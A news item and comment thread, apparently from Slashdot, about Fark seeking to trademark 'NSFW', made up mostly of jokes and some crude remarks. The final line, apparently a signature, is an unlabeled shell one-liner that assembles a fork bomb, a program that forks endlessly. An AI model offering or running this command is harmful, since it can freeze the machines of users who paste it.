Fark Seeks to Trademark NSFW
I Don't Believe in Imaginary Property writes "The term NSFW is about to join the :( emoticon, going from a generic, oft-used internet abbreviation, to one company's exclusive trademark. Fark is seeking a trademark on the use of NSFW to describe naughty online content. Of course, they may face a bit of a battle because more than a few other people are already using the term NSFW to describe their products and services. Not that that's stopped anyone in the past." And, of course, the whole thing could be a big practical joke.
Guess nobody clicked on the story cause it's marked NSFW! :)
My blog
In retaliation, CmdrTaco has filed a trademark for "slashies"
// had to do it
/ sorry
Those who believe the Internet is private,
find their privates are on the Internet.
Now that is recursion at its finest.... Imagine a superscript TM with a smaller superscript TM above it, trailing off into the nether regions of unprintability...
Sure, and it was all fun and games until "The Daily WTF" was forced to rename by the World Trade Federation.
I'm going to trademark "Florida". That way Drew will have to cross license with me to get most of his crazy news stories.
Wow, sent an e-mail as suggested when clicking on "use classic" banner, and got a fast response that addressed my msg
A friend told me that NSFW stood for "Now Show Friends and Workmates"... I'm now unemployed :(
Amazingly, even today, I still don't know exactly what fark.com is or does. All I know is that, if this story is true, I would have less of an inclination to support it or even go there. Then again, I seem to be the only person left in the US that will not buy an XBox360 because of the parent companies prior and current PC industry "tactics" and business model.
Every time I start to have faith in humanity, I ruin it by driving to work between 7 and 8 am.
only if we can trademark IORAL too...
No, Apple already trolled the iOral for their sex toy
Then Apple has probably already trademarked iAnal, too.
Fark is a pathetic shell of what it used to be. Drew has really screwed up the site as compared to its glory days. I think this is another attempt at attention whoring to get people to come back to his site. It's not going to work. Fuck Drew. He'll get over it.
When all else fails, run.
http://img512.imageshack.us/img512/6254/pic321bs0.jpg
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;